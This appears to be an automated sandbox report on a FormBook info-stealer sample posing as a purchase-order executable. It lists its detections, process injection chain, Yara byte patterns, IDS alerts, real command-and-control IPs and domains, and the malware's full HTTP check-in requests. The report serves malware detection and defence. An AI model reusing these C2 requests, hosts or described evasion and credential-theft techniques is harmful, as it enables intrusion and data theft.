Windows Analysis Report
PO2-2401-0016 (TR).exe

Overview

General Information

Sample name: PO2-2401-0016 (TR).exe
Analysis ID: 1511724
MD5: 6f8e7d082d8c039064cbcc813d24dcb4
SHA1: 2715db08498311cf04b28be93049916c6684685c
SHA256: 392d1c5876d7d023d9d207fd1b5badce5939abad6b4796adb79a292aefb6f574
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PO2-2401-0016 (TR).exe (PID: 6484 cmdline: "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe" MD5: 6F8E7D082D8C039064CBCC813D24DCB4)
    • svchost.exe (PID: 2964 cmdline: "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • WwOlfblnYaWmLq.exe (PID: 2612 cmdline: "C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RMActivate_ssp.exe (PID: 1892 cmdline: "C:\Windows\SysWOW64\RMActivate_ssp.exe" MD5: 6599A09C160036131E4A933168DA245F)
          • WwOlfblnYaWmLq.exe (PID: 728 cmdline: "C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6432 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps (Source / Rule / Description / Author / Strings); 11 entries in total, 3 shown here:

Source: 00000005.00000002.4509591514.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 00000005.00000002.4509591514.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  Strings:
    • 0x2bdd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13fcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000002.00000002.2279303551.0000000000400000.00000040.80000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 00000002.00000002.2279303551.0000000000400000.00000040.80000000.00040000.00000000.sdmp
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  Strings:
    • 0x2f573:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17772:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000005.00000002.4509486697.0000000002A70000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security

Yara matches in unpacked PE files (Source / Rule / Description / Author / Strings):

Source: 2.2.svchost.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 2.2.svchost.exe.400000.0.unpack
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  Strings:
    • 0x2e773:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x16972:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 2.2.svchost.exe.400000.0.raw.unpack
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 2.2.svchost.exe.400000.0.raw.unpack
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  Strings:
    • 0x2f573:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17772:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Sigma matches:

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe", CommandLine: "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe", ParentImage: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe, ParentProcessId: 6484, ParentProcessName: PO2-2401-0016 (TR).exe, ProcessCommandLine: "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe", ProcessId: 2964, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe", CommandLine: "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe", ParentImage: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe, ParentProcessId: 6484, ParentProcessName: PO2-2401-0016 (TR).exe, ProcessCommandLine: "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe", ProcessId: 2964, ProcessName: svchost.exe

Suricata IDS alerts:

Timestamp                        SID      Severity  Classtype                                      Source IP    Src Port  Destination IP   Dst Port  Protocol
2024-09-16T09:29:43.875285+0200  2050745  1         Malware Command and Control Activity Detected  192.168.2.5  49711     47.57.185.227    80        TCP
2024-09-16T09:30:07.474250+0200  2050745  1         Malware Command and Control Activity Detected  192.168.2.5  58649     89.58.49.1       80        TCP
2024-09-16T09:30:29.659742+0200  2050745  1         Malware Command and Control Activity Detected  192.168.2.5  58653     154.23.184.240   80        TCP
2024-09-16T09:30:43.414357+0200  2050745  1         Malware Command and Control Activity Detected  192.168.2.5  58657     85.159.66.93     80        TCP
2024-09-16T09:30:56.798181+0200  2050745  1         Malware Command and Control Activity Detected  192.168.2.5  58661     185.173.111.76   80        TCP
2024-09-16T09:31:10.331009+0200  2050745  1         Malware Command and Control Activity Detected  192.168.2.5  58665     203.161.43.228   80        TCP
2024-09-16T09:31:23.649305+0200  2050745  1         Malware Command and Control Activity Detected  192.168.2.5  58669     161.97.168.245   80        TCP
2024-09-16T09:31:38.353891+0200  2050745  1         Malware Command and Control Activity Detected  192.168.2.5  58673     172.96.191.39    80        TCP
2024-09-16T09:31:51.621138+0200  2050745  1         Malware Command and Control Activity Detected  192.168.2.5  58677     104.21.20.125    80        TCP
2024-09-16T09:32:07.548753+0200  2050745  1         Malware Command and Control Activity Detected  192.168.2.5  54907     43.242.202.169   80        TCP
2024-09-16T09:32:28.946660+0200  2050745  1         Malware Command and Control Activity Detected  192.168.2.5  54911     104.207.148.137  80        TCP
2024-09-16T09:32:42.501756+0200  2050745  1         Malware Command and Control Activity Detected  192.168.2.5  54915     185.104.29.12    80        TCP
2024-09-16T09:32:56.015666+0200  2050745  1         Malware Command and Control Activity Detected  192.168.2.5  54919     65.21.196.90     80        TCP
2024-09-16T09:33:18.095887+0200  2050745  1         Malware Command and Control Activity Detected  192.168.2.5  54923     47.57.185.227    80        TCP


            AV Detection

Source: PO2-2401-0016 (TR).exe | Avira: detected
Source: PO2-2401-0016 (TR).exe | Virustotal: Detection: 48%
Source: PO2-2401-0016 (TR).exe | ReversingLabs: Detection: 50%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.4509591514.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2279303551.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4509486697.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4511569074.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2283186633.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2280748926.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4508334396.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4509574666.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: PO2-2401-0016 (TR).exe | Joe Sandbox ML: detected
Source: PO2-2401-0016 (TR).exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WwOlfblnYaWmLq.exe, 00000003.00000000.2201599538.00000000007AE000.00000002.00000001.01000000.00000004.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000002.4508332207.00000000007AE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000002.00000003.2247452645.0000000003F01000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2247372843.000000000321A000.00000004.00000020.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000002.4513030098.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000002.4509012670.0000000001498000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO2-2401-0016 (TR).exe, 00000000.00000003.2059592529.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, PO2-2401-0016 (TR).exe, 00000000.00000003.2061283360.0000000004240000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279732575.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2184300413.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279732575.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2182333043.0000000003500000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000003.2282930562.0000000002ADA000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000003.2284887990.0000000002C85000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4509793965.0000000002E30000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4509793965.0000000002FCE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO2-2401-0016 (TR).exe, 00000000.00000003.2059592529.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, PO2-2401-0016 (TR).exe, 00000000.00000003.2061283360.0000000004240000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2279732575.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2184300413.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279732575.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2182333043.0000000003500000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, RMActivate_ssp.exe, 00000005.00000003.2282930562.0000000002ADA000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000003.2284887990.0000000002C85000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4509793965.0000000002E30000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4509793965.0000000002FCE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RMActivate_ssp.exe, 00000005.00000002.4510222204.000000000345C000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4508610835.0000000000692000.00000004.00000020.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000002.4509717611.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2626008848.000000002F2AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RMActivate_ssp.exe, 00000005.00000002.4510222204.000000000345C000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4508610835.0000000000692000.00000004.00000020.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000002.4509717611.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2626008848.000000002F2AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: rmactivate_ssp.pdbGCTL source: svchost.exe, 00000002.00000003.2247452645.0000000003F01000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2247372843.000000000321A000.00000004.00000020.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000002.4513030098.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000002.4509012670.0000000001498000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_0018C2A2 FindFirstFileExW, 0_2_0018C2A2
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001C68EE FindFirstFileW,FindClose, 0_2_001C68EE
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001C698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_001C698F
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001BD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_001BD076
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001BD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_001BD3A9
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001C9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_001C9642
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001C979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_001C979D
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001C9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_001C9B2B
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001BDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_001BDBBE
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001C5C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_001C5C97
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 5_2_0035C380 FindFirstFileW,FindNextFileW,FindClose, 5_2_0035C380
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4x nop then xor eax, eax | 5_2_00349B30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4x nop then mov ebx, 00000004h | 5_2_02BD04E7

            Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58669 -> 161.97.168.245:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58661 -> 185.173.111.76:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:54911 -> 104.207.148.137:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:54919 -> 65.21.196.90:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49711 -> 47.57.185.227:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:54915 -> 185.104.29.12:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58649 -> 89.58.49.1:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:54923 -> 47.57.185.227:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58657 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58665 -> 203.161.43.228:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58677 -> 104.21.20.125:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:54907 -> 43.242.202.169:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58653 -> 154.23.184.240:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:58673 -> 172.96.191.39:80
Source: DNS query: www.golbasi-nakliyat.xyz
Source: DNS query: www.kckartal.xyz
Source: DNS query: www.070001350.xyz
Source: Joe Sandbox View | IP Address: 65.21.196.90
Source: Joe Sandbox View | IP Address: 47.57.185.227
Source: Joe Sandbox View | ASN Name: CP-ASDE
Source: Joe Sandbox View | ASN Name: AS-ZXCSNL
Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (18 occurrences)
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001CCE44 InternetReadFile,SetEvent,GetLastError,SetEvent, 0_2_001CCE44
Source: global traffic | HTTP traffic detected:
GET /w9nd/?bX=9dRK0h7YIJsGSRni8bUofvVG/PCfrhvBPHBwJCn+XP7nQ6BgyCo2QTTghBp7CnsQKe5GALi32E4BE+loUVZtsDQ0fsSUzmOhwAoGTPqsz12jBMJXijf4AdQEcpHIqPDRWg==&RFRd_=tFLD HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.726075.buzz
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36

Source: global traffic | HTTP traffic detected:
GET /xcfw/?bX=bjW1F6zberoR1D3bw3FdYWJ+vrSF97RpHttayncOl0oweWLXznwX2+g7zIG3cvz9HU+qZyWIdkFY93Q5IGFA2CDhFv5wQZ64tx6dBz0c4KNQxRUIYxJE7HIG/DzEWEHYrw==&RFRd_=tFLD HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.freepicture.online
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36

Source: global traffic | HTTP traffic detected:
GET /p39s/?RFRd_=tFLD&bX=1N9NMDNpm9Czos0sMOBPjc8XecgVvOOrSL4zw6nNIeZI+vV5F9OeQvh5MDj1LHrQPj2dGZTcA38l142ujvV8zKUy6S3cHQGYd//xgFiAZgSqx5KudB9OKNvEpiaWMoszOg== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.hm62t.top
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36

Source: global traffic | HTTP traffic detected:
GET /k2vl/?bX=TxupyKnRMohPPcJXB3Z3XcqD+FlghHQdGmgAGE+PRAnDIVDTmPtyynXiyBeLb9PD0fLjVO+SDceqOMvNcp9bLYIXV/UJ9VQc/byMU5VVxwAJLh5LFxVJTQrrPq42LBMvWA==&RFRd_=tFLD HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.golbasi-nakliyat.xyz
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36

Source: global traffic | HTTP traffic detected:
GET /lwt6/?bX=j/d5AuZ+qvKLIrA78xGuwt+n8Fyj4Fobkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZXWIw83yuKrEb5GYAT/WLDDlAfH79a/0YJ9h9gjbLSxDOvQ==&RFRd_=tFLD HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.mfgamecompany.shop
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36

Source: global traffic | HTTP traffic detected:
GET /ftr3/?bX=7ghTfXuNFdv7bt0fQ6dp+VYKrg9F0VottJoldp68xQSgk3fAwjETInI5bmz0SHizsmBfpbcRVbCgLhFU68m+g+0qN5CZ17IzjLi3DtoRUNuK8DdWmd+CTazIxVVgqHT8dA==&RFRd_=tFLD HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.quilo.life
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36

Source: global traffic | HTTP traffic detected:
GET /wjff/?bX=4KVKOjLTUXvpTd2u/bZ1Xtjp48VIQpKAiZnao6g9chZjOHWeMu7z3zqylslmOgP9LXsxnQP9kQW6V1nPysVCefcRDYtQJbJyj2mk5xrQKh9CjNT1kJiwas5jw5tGEdzT0Q==&RFRd_=tFLD HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.qiluqiyuan.buzz
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36

Source: global traffic | HTTP traffic detected:
GET /3lkx/?bX=RihUS+ZcBcWtP49fbKLPl8hUiWX9OeM0xYk2jkkE+x6ehgmefEg3XF27GOoD6ZAnAm79O7OuHoRKwHtCqV4uYWL7+sOZXKma82UzwNxpRmep+gGd7K5Ptmsj9EAWiB5wAw==&RFRd_=tFLD HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.bola88site.one
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36

Source: global traffic | HTTP traffic detected:
GET /h5qr/?bX=/bmdZ0vLXnogocV3t4J0vpXKy2/OoNnhB87loKV3gq9LyeQpMfhyu6mMTgPwDPC8F+hhJIsm9BUDnxBtc5ev2o5O2JmBXO2rvj/sbpH3UdghJzgGJYmb4kNKd7aCf9ce4Q==&RFRd_=tFLD HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.kckartal.xyz
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36

Source: global traffic | HTTP traffic detected:
GET /ed2j/?bX=HnYP2yoU4dt40olsHjvCR7kBP/y2BgIkbcmGMLslyKV8dFp2SGuaYgvLul2clibdaJeHhADQmhDO4iexoifjcdOeiKY5v07N606wVFpuauJi0/RjjYjigABfPEh6YVaweA==&RFRd_=tFLD HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.mizuquan.top
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36

Source: global traffic | HTTP traffic detected:
GET /ijno/?bX=Dl/71iUE13/iiXwoBfJjBLiuXn/LC2nGhOcLBPqUgcWlG3I9myODuvD/dy+WEToB6xBGpoD2p7QTvgcO3M3YppYLGUXZXpGn5emzv8m+RO5fgId9MtFylBATvIp79Sr7dA==&RFRd_=tFLD HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.capbear.net
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36

Source: global traffic | HTTP traffic detected:
GET /kdsf/?bX=mrPbX6f2ANh6eH6BaYBcOaExirfKelxT8B/s11FteNVWpCBC/Ng1kYBANMlCHLb8Vm1KElmPNEHDJkuYfrXhfpk22msKwfJUhUP/5Z9IMLZY9GQtDtvdXiZeiMyh2YwcFA==&RFRd_=tFLD HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.groet.online
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36

